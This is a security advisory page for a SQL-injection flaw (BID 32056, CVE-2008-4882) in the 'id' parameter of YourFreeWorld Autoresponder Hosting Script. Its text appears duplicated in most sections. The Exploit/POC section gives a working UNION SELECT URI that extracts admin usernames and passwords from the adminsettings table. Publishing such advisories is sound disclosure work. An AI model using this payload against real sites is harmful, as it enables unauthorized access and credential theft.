YourFreeWorld Autoresponder Hosting Script 'id' Parameter SQL Injection Vulnerability
BID:32056
Info
YourFreeWorld Autoresponder Hosting Script 'id' Parameter SQL Injection Vulnerability
| Bugtraq ID: | 32056 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-4882 |
| Remote: | Yes |
| Local: | No |
| Published: | Nov 01 2008 12:00AM |
| Updated: | Apr 16 2015 05:52PM |
| Credit: | Hussin X |
| Vulnerable: |
YourFreeWorld Autoresponder Hosting Script 0 |
| Not Vulnerable: | |
Discussion
YourFreeWorld Autoresponder Hosting Script 'id' Parameter SQL Injection Vulnerability
Autoresponder Hosting Script is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Autoresponder Hosting Script is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Exploit / POC
YourFreeWorld Autoresponder Hosting Script 'id' Parameter SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com/autoresponderhosting/tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings--
Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com/autoresponderhosting/tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings--
Solution / Fix
YourFreeWorld Autoresponder Hosting Script 'id' Parameter SQL Injection Vulnerability
Solution:
Reportedly the vendor has fixed the issue. Please contact the vendor for details.
Solution:
Reportedly the vendor has fixed the issue. Please contact the vendor for details.
References
YourFreeWorld Autoresponder Hosting Script 'id' Parameter SQL Injection Vulnerability
References:
References:
- Autoresponder Hosting Script (YourFreeWorld)